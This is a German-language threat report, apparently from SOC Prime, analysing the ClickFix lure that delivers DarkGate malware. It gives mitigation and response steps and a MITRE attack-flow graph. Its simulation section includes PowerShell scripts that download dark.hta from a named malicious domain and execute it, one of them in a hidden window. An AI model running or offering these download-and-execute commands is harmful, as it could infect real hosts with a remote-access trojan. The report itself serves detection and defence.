SOC Prime Bias: Medium

16 Dez. 2025 21:07
newspaper icon Point Wild

ClickFix Fallstudie: DarkGate-Malware

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
ClickFix Fallstudie: DarkGate-Malware
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

Der Bericht beschreibt eine Social-Engineering-Methode namens ClickFix, die Benutzer dazu verleitet, einen PowerShell-Befehl zu kopieren und auszuführen, der dann eine bösartige HTA-Datei herunterlädt. Diese HTA-Datei zieht weitere Komponenten nach, darunter ein AutoIt-Skript, das Verzeichnisse erstellt, Dateien ablegt und C2-Kommunikation aufbaut. Die Aktivität wird der DarkGate-Kampagne zugeschrieben und verwendet Base64-Verschleierung sowie Manipulation der Zwischenablage, um eine einfache Erkennung zu vermeiden.

Untersuchung

Analysten entwirrten mehrere Schichten von base64-codiertem Inhalt, der in einer gefälschten Warnseite für Browsererweiterungen eingebettet war, und ermittelten den PowerShell-Befehl, der für das Abrufen von dark.hta von linktoxic34.com verantwortlich ist. Bei Ausführung setzt die HTA eine AutoIt-executable (fckhffh.a3x) ein, die eine DES-Routine ausführt und weitere Nutzlasten startet. Erfasste Netzwerk-Telemetriedaten zeigen HTTP(S)-Verkehr zur bösartigen Domain, gefolgt von einer verketteten Ausführung eines PowerShell-Skripts.

Minderung

Empfohlene Verteidigungsmaßnahmen umfassen Schulungen zur Benutzerbewusstheit, um das Kopieren unbekannter Code-Snippets zu verhindern, das Deaktivieren des Windows-Dialogfelds ‚Ausführen‘ über Gruppenrichtlinien und den Einsatz verhaltensbasierter Antiviruslösungen. Das proaktive Blockieren der bösartigen Domain und die Überwachung von anomalem PowerShell-Ausführungen können das Risiko einer DarkGate-Infektion erheblich verringern.

Reaktion

Wenn ein ClickFix-bezogenes Ereignis identifiziert wird, isolieren Sie das betroffene Endgerät, stoppen Sie alle bösartigen Prozesse, entfernen Sie die HTA- und AutoIt-Artefakte und führen Sie eine forensische Analyse der während des Eindringens erstellten Ordner durch. Aktualisieren Sie die Erkennungslogik, um verdächtige Ausführungsmuster von PowerShell und HTA zu kennzeichnen, und stellen Sie sicher, dass die zugehörige Domain im gesamten Netzwerk blockiert ist.

„graph TB %% Klassendefinitionen classDef asset fill:#f0e68c classDef technique fill:#ffcc99 classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#e6e6fa classDef process fill:#ffdddd %% Knoten webpage_malicious[„<b>Asset</b> – Schadseite<br/>Enthält base64u2011kodierten PowerShell und umgekehrteu2011Zeichenfolge-Obfuskierung“] class webpage_malicious asset tech_html_smuggling[„<b>Technik</b> – <b>T1027.006</b> Obfuskierte Dateien oder Informationen: HTML-Schmuggel<br/>Base64 PowerShell verborgen in HTML/JavaScript“] class tech_html_smuggling technique tech_stripped_payloads[„<b>Technik</b> – <b>T1027.008</b> Obfuskierte Dateien oder Informationen: Stripptes Payload<br/>Verschachtelte base64-Zeichenfolgen verschleiern PowerShell“] class tech_stripped_payloads technique action_user_click[„<b>Aktion</b> – <b>T1204.001</b> Benutzerausführung: Bösartiger Link<br/>Der Benutzer klickt auf den Button „Wie man behebt““] class action_user_click action tech_clipboard_data[„<b>Technik</b> – <b>T1115</b> Zwischenablagedaten<br/>Skript kopiert PowerShell-Befehl in die Zwischenablage“] class tech_clipboard_data technique action_copy_paste[„<b>Aktion</b> – <b>T1204.004</b> Benutzerausführung: Bösartiges Kopieren und Einfügen<br/>Der Benutzer fügt den Befehl über Win+R und Strg+V ein“] class action_copy_paste action tech_powershell[„<b>Technik</b> – <b>T1059.001</b> Befehls- und Skripting-Interpreter: PowerShell<br/>Führt heruntergeladenen Befehl aus“] class tech_powershell technique process_powershell[„<b>Prozess</b> – PowerShell“] class process_powershell process tech_web_protocol[„<b>Technik</b> – <b>T1071.001</b> Anwendungsschicht-Protokoll: Webprotokolle<br/>Lädt HTA über HTTP(S) herunter“] class tech_web_protocol technique file_dark_hta[„<b>Datei</b> – dark.hta<br/>HTA-Payload von linktoxic34.com heruntergeladen“] class file_dark_hta file tech_mshta[„<b>Technik</b> – <b>T1218.005</b> Proxy-Ausführung von System-Binärdateien: Mshta<br/>Führt HTA über mshta.exe aus“] class tech_mshta technique process_mshta[„<b>Prozess</b> – mshta.exe“] class process_mshta process tech_lateral_transfer[„<b>Technik</b> – <b>T1570</b> Seitlicher Werkzeugtransfer<br/>HTA lässt ZIP-Archiv mit zusätzlichen Binärdateien fallen“] class tech_lateral_transfer technique file_payload_zip[„<b>Datei</b> – payload.zip<br/>Enthält AutoIt-Skript und Binärdateien“] class file_payload_zip file tech_masquerading[„<b>Technik</b> – <b>T1036</b> Maskierung<br/>HTA wird als legitimes Reparaturwerkzeug präsentiert“] class tech_masquerading technique tech_rtl_override[„<b>Technik</b> – <b>T1036.002</b> Maskierung: Rechtenau2011zum2011Linken-Override<br/>Umgekehrteu2011Zeichenfolgenkodierung zur Umgehung der Erkennung“] class tech_rtl_override technique tool_darkgate[„<b>Werkzeug</b> – DarkGate RAT<br/>Bietet persistente Fernzugriffsmöglichkeit“] class tool_darkgate tool tech_remote_access[„<b>Technik</b> – <b>T1219</b> Fernzugriffswerkzeuge<br/>Stellt C2-Kommunikationen her“] class tech_remote_access technique %% Verbindungen webpage_malicious u002du002d>|verwendet| tech_html_smuggling webpage_malicious u002du002d>|verwendet| tech_stripped_payloads webpage_malicious u002du002d>|löst aus| action_user_click action_user_click u002du002d>|führt zu| tech_clipboard_data tech_clipboard_data u002du002d>|ermöglicht| action_copy_paste action_copy_paste u002du002d>|führt aus| tech_powershell tech_powershell u002du002d>|führt aus| process_powershell process_powershell u002du002d>|lädt herunter| tech_web_protocol tech_web_protocol u002du002d>|ruft ab| file_dark_hta file_dark_hta u002du002d>|ausgeführt von| tech_mshta tech_mshta u002du002d>|führt aus| process_mshta process_mshta u002du002d>|lässt fallen| tech_lateral_transfer tech_lateral_transfer u002du002d>|erstellt| file_payload_zip file_dark_hta u002du002d>|maskiert als| tech_masquerading file_dark_hta u002du002d>|verhüllt mit| tech_rtl_override file_payload_zip u002du002d>|enthält| tool_darkgate tool_darkgate u002du002d>|verwendet| tech_remote_access „

Angriffsfluss

Simulation der Ausführung

Voraussetzung: Der Telemetrie- und Basislinien-Pre-Flight-Check muss bestanden haben.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die zum Auslösen der Erkennungsregel entwickelt wurde. Die Befehle und Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und zielen darauf ab, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.

  • Angriffs-Narrativ & Befehle:
    Ein Angreifer, der Zugriff mit niedrigen Rechten auf einem kompromittierten Windows-Host erlangt hat, möchte eine bösartige HTA-Nutzlast herunterladen, die in der ClickFix-Kampagne verwendet wird. Um unauffällig zu bleiben, nutzt der Angreifer PowerShell—ein natives Windows-Tool—damit keine externen Binärdateien eingeführt werden. Der Befehl wird direkt in der Konsole ausgeführt (oder über eine geplante Aufgabe) und beinhaltet die exakte URL, auf die die Regel achtet. Der Download wird im Benutzerverzeichnis %TEMP% gespeichert und dann über Start-Process.

    $url = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta"
$out = "$env:TEMPdark.hta"
Invoke-WebRequest -Uri $url -OutFile $out
Start-Process -FilePath $out

  • Regressionstest-Skript: (in sich geschlossen, reproduziert die obigen Schritte)

    # ClickFix HTA-Download-Simulation – löst die Sigma-Regel aus
$maliciousUrl = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta"
$destPath = "$env:TEMPdark.hta"

try {
    Write-Host "[*] Herunterladen der bösartigen HTA-Nutzlast..."
    Invoke-WebRequest -Uri $maliciousUrl -OutFile $destPath -UseBasicParsing
    Write-Host "[+] Download abgeschlossen. Nutzlast wird ausgeführt..."
    Start-Process -FilePath $destPath -WindowStyle Hidden
} catch {
    Write-Error "Download oder Ausführung fehlgeschlagen: $_"
}

  • Aufräumbefehle: (entfernt die heruntergeladene HTA und alle laufenden Instanzen)

    # Entfernen der HTA-Datei und Beenden aller verbleibenden Prozesse
$htaPath = "$env:TEMPdark.hta"
if (Test-Path $htaPath) {
    Remove-Item $htaPath -Force
    Write-Host "[*] HTA-Datei entfernt."
}
# Beenden Sie jeden Prozess, der möglicherweise von der HTA gestartet wurde (generisches Beispiel)
Get-Process | Where-Object {$_.Path -like "*dark.hta*"} | Stop-Process -Force

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit in Bedrohungen zu verbessern, die für Ihr Unternehmen am relevantesten sind. Um Ihnen den Einstieg zu erleichtern und sofortigen Nutzen zu bieten, buchen Sie jetzt ein Treffen mit SOC Prime-Experten.

Kostenlos beitreten